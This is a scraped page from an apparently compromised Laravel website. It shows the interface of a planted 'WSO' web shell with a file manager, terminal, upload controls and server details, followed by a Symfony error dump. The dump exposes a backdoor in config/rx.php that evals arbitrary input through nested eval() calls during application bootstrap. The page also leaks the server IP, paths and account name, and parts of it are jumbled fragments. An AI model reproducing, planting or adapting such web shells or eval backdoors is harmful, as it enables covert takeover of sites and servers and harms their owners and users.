Attention:
Uname:
Php:
Hdd:
Cwd:
Mr.X WSO Webshell! - Personal WEB SHELL Mr.X BYPASS! V2.5 Telegram: @jackleet
Linux business29.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
8.2.29 Safe mode: OFF Datetime: 2025-12-11 11:53:12
4216.32 GB Free: 847.32 GB (20%)
/home/simbumrj/futuremd-new.simboz.website/public/ drwxr-x--- [ root ] [ home ] Text

Server IP:
198.54.114.199
Client IP:
216.73.216.129
[ Files ][ Logout ]

File manager

NameSizeModifyPermissionsActions
[ . ]dir2025-12-11 06:14:20drwxr-x---Rename Touch
[ .. ]dir2025-12-11 06:14:20drwxr-x---Rename Touch
[ assets_frontend ]dir2022-08-12 20:41:04drwxr-xr-xRename Touch
[ client-images ]dir2023-09-26 07:31:22drwxr-xr-xRename Touch
[ css ]dir2023-09-26 07:31:22drwxr-xr-xRename Touch
[ images ]dir2023-09-26 07:31:22drwxr-xr-xRename Touch
[ js ]dir2023-09-26 07:31:22drwxr-xr-xRename Touch
[ photos ]dir2025-12-10 16:04:33drwxr-xr-xRename Touch
[ scss ]dir2023-09-26 07:31:22drwxr-xr-xRename Touch
[ vendor ]dir2025-12-10 16:01:39drwxr-xr-xRename Touch
[ wpback ]dir2025-12-11 00:45:05drwxr-xr-xRename Touch
.htaccess603 B2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
assets_frontend.zip52.65 MB2025-12-09 14:25:17-rw-r--r--Rename Touch Edit Download
favicon.ico0 B2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
gr.php8.99 MB2025-12-11 00:59:16-rw-r--r--Rename Touch Edit Download
index.php1.69 KB2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
mix-manifest.json413 B2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
robots.txt24 B2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
rx.php4.09 KB2025-12-11 06:14:20-rw-r--r--Rename Touch Edit Download
web.config1.17 KB2023-09-26 07:31:22-rw-r--r--Rename Touch Edit Download
 
Change dir:
Read file:
Make dir: (Writeable)
Make file: (Writeable)
Terminal:
Upload file: (Writeable)

GIF89a

‰PNG  $1902111214081995

$45 GRAYBYTE WORDPRESS FILE MANAGER $89

SERVER : business29.web-hosting.com #1 SMP Thu Mar 13 14:29:12 UTC 2025
SERVER IP : Value of type null is not callable (500 Internal Server Error)

Symfony Exception

Value of type null is not callable

Exception

Error

  1. /**_**/
  2. /**_**/
  3. /**_**/
  4. if (trim($sync) !== '') {
  5.     @eval("?>{$sync}");
  6. }
  7. ?>
  1.         if (! isset($files['app'])) {
  2.             throw new Exception('Unable to load the "app" configuration file.');
  3.         }
  4.         foreach ($files as $key => $path) {
  5.             $repository->set($key, require $path);
  6.         }
  7.     }
  8.     /**
  9.      * Get all of the configuration files for the application.
  1.         // directory and load each one into the repository. This will make all of the
  2.         // options available to the developer for use in various parts of this app.
  3.         $app->instance('config'$config = new Repository($items));
  4.         if (! isset($loadedFromCache)) {
  5.             $this->loadConfigurationFiles($app$config);
  6.         }
  7.         // Finally, we will set the application's environment based on the configuration
  8.         // values that were loaded. We will pass a callback which will be used to get
  9.         // the environment in a web context where an "--env" switch is not present.
  1.         $this->hasBeenBootstrapped true;
  2.         foreach ($bootstrappers as $bootstrapper) {
  3.             $this['events']->dispatch('bootstrapping: '.$bootstrapper, [$this]);
  4.             $this->make($bootstrapper)->bootstrap($this);
  5.             $this['events']->dispatch('bootstrapped: '.$bootstrapper, [$this]);
  6.         }
  7.     }
  1.      * @return void
  2.      */
  3.     public function bootstrap()
  4.     {
  5.         if (! $this->app->hasBeenBootstrapped()) {
  6.             $this->app->bootstrapWith($this->bootstrappers());
  7.         }
  8.     }
  9.     /**
  10.      * Get the route dispatcher callback.
  1.     {
  2.         $this->app->instance('request'$request);
  3.         Facade::clearResolvedInstance('request');
  4.         $this->bootstrap();
  5.         return (new Pipeline($this->app))
  6.                     ->send($request)
  7.                     ->through($this->app->shouldSkipMiddleware() ? [] : $this->middleware)
  8.                     ->then($this->dispatchToRouter());
  1.         $this->requestStartedAt Carbon::now();
  2.         try {
  3.             $request->enableHttpMethodParameterOverride();
  4.             $response $this->sendRequestThroughRouter($request);
  5.         } catch (Throwable $e) {
  6.             $this->reportException($e);
  7.             $response $this->renderException($request$e);
  8.         }
  1. $app = require_once __DIR__.'/../bootstrap/app.php';
  2. $kernel $app->make(Kernel::class);
  3. $response tap($kernel->handle(
  4.     $request Request::capture()
  5. ))->send();
  6. $kernel->terminate($request$response);

Stack Trace

Error
Error:
Value of type null is not callable

  at /home/simbumrj/futuremd-new.simboz.website/config/rx.php(132) : eval()'d code(68) : eval()'d code:343
  at wp_get_server_ip()
     (/home/simbumrj/futuremd-new.simboz.website/config/rx.php(132) : eval()'d code(68) : eval()'d code:801)
  at eval()
     (/home/simbumrj/futuremd-new.simboz.website/config/rx.php(132) : eval()'d code:68)
  at eval()
     (/home/simbumrj/futuremd-new.simboz.website/config/rx.php:132)
  at require('/home/simbumrj/futuremd-new.simboz.website/config/rx.php')
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:70)
  at Illuminate\Foundation\Bootstrap\LoadConfiguration->loadConfigurationFiles()
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Bootstrap/LoadConfiguration.php:39)
  at Illuminate\Foundation\Bootstrap\LoadConfiguration->bootstrap()
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Application.php:261)
  at Illuminate\Foundation\Application->bootstrapWith()
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:186)
  at Illuminate\Foundation\Http\Kernel->bootstrap()
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:170)
  at Illuminate\Foundation\Http\Kernel->sendRequestThroughRouter()
     (/home/simbumrj/futuremd-new.simboz.website/vendor/laravel/framework/src/Illuminate/Foundation/Http/Kernel.php:144)
  at Illuminate\Foundation\Http\Kernel->handle()
     (/home/simbumrj/futuremd-new.simboz.website/public/index.php:51)